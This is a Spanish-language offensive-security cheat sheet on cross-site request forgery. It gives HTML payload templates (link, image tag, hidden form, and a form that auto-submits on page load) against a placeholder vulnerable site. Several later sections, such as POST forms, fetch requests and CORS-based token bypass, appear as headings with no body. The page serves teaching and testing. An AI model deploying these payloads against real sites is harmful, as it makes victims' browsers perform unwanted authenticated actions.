search
Home

Cross-site request forgery (CSRF)

Same-origin policy (SOP) no permitirá que un atacante obtenga la respuesta del servidor a una solicitud maliciosa realizada desde otro origen, pero no previene la realización de peticiones desde otros orígenes. Esto significa que same-origin policy (SOP) no puede considerarse un mecanismo de seguridad contra ataques de cross-site request forgery (CSRF).

hashtag
HTML GET con interacción de usuario

<a href="http://web-vulnerable.com/?param=CSRF">Haz clic aquí</a>

hashtag
HTML GET sin interacción de usuario

<img src="http://web-vulnerable.com/?param=CSRF">

hashtag
Formulario HTML GET con interacción de usuario

<form action="http://web-vulnerable.com" method="GET">
 <input name="param" type="hidden" value="CSRF" />
 <input type="submit" value="Haz clic aquí" />
</form>

hashtag
Formulario HTML GET sin interacción de usuario

csrf-html-get.html
<html>
  <body onload="document.forms['csrf'].submit()">
   <form action="http://web-vulnerable.com" method="GET" name="csrf">
    <input name="param" type="hidden" value="CSRF" />
    <input type="submit" value="Haz clic aquí" />
   </form>
 </body>
</html>

hashtag
Formulario HTML POST con interacción de usuario

hashtag
Formulario HTML POST sin interacción de usuario

hashtag
Una solicitud

hashtag
Múltiples solicitudes

hashtag
JavaScript fetch POST sin interacción de usuario

Alojar y servir página maliciosa.

Víctima visita página maliciosa.

hashtag
Eludir tokens CSRF mediante configuraciones incorrectas de CORS

AnteriorCross-site scripting (XSS)SiguienteFile upload

Última actualización